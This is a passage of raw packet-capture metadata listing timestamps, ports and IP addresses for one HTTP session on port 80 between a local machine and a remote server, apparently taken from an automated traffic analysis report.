Apr 27, 2024 00:46:06.633580923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633615017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633639097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633641958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633697987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633734941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633774996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633812904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633847952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633876085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633915901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633953094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633980036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634020090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634052992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634082079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634098053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634135008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634152889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634213924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634249926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634289980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634308100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634339094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634418011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634484053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634519100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634535074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634598017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634634018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634645939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634711981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634727001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634742022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634809017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634843111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634846926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634896040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.634932041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.634994030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635062933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635096073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.635122061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635174036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635206938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.635266066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635433912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635469913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.635492086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635977983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.635994911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636007071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636013031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636025906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636039019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636044025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636053085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636073112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636126995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636161089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636164904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636217117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636246920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636255980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636337996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636370897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636431932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636509895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636543036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636581898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636626005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636667013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636699915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636708021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636738062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636765003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636801958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636825085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636859894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636878967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636913061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.636921883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.636961937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637002945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637038946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637325048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637362957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637372017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637422085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637423992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637454987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637479067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637516022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637572050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637613058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637692928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637732983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637775898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637809992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637883902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.637919903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.637959003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638012886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638044119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638081074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638111115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638147116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638178110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638209105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638242960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638272047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638457060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638493061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638533115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638570070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638572931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638603926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638762951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638802052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638874054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638907909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.638911963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638942957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.638972998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639004946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639023066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639060020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639091969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639127016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639167070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639204979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639282942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639319897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639353991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639369011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639405966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639415026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639425039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639460087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639497995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639511108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639538050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639549017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639579058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639615059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639616966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639650106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639655113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639667988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639687061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639703989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639727116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639767885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639808893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639851093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.639880896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.639918089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640021086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640057087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640136003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640168905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640187025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640223980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640232086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640269995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640327930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640374899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640410900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640440941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640500069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640537977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640568018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640600920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.640893936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.640928984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641016006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641048908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641122103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641159058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641241074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641274929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641383886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641422987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641475916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641514063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641629934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641664028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641761065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641793966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641851902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641890049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.641952038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.641983986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642064095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642098904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642131090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642158985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642168045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642204046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642245054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642277002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642303944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642342091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642363071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642401934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642451048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642494917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642528057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642559052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642566919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642594099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642612934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642647982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642688990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642721891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642801046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642833948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642854929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642891884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.642896891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.642925978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643001080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643033981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643085957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643112898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643124104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643151999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643193960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643233061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643254995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643300056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643304110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643333912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643416882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643454075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643481970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643515110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643563986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643601894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643637896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643667936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643670082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643704891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643735886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643771887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643801928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643840075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643882990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643919945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.643949032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.643978119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644007921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644042969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644141912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644181967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644207001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644238949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644251108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644285917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644321918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644359112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644380093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644428015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644437075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644474983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644489050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644526005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644556046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644584894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644588947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644619942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644702911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644745111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644769907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644807100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.644843102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.644875050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645030975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645085096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645117998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645149946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645416975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645454884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645523071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645565033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645637035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645670891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645713091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645747900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645824909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.645862103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.645987034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.646024942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.646092892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.646127939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.646138906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.646162033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.646207094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.646236897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.646270037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.646302938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650381088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650424004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650501013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650537968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650609016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650648117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650752068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650788069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650882006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650918961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.650960922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.650996923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651002884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651036024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651114941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651151896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651171923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651206970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651253939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651292086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651308060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651340008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651349068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651381969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651407003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651454926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651479006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651510954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651590109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651628017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651725054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651762962 CEST	49734	80	192.168.2.4	176.97.76.106
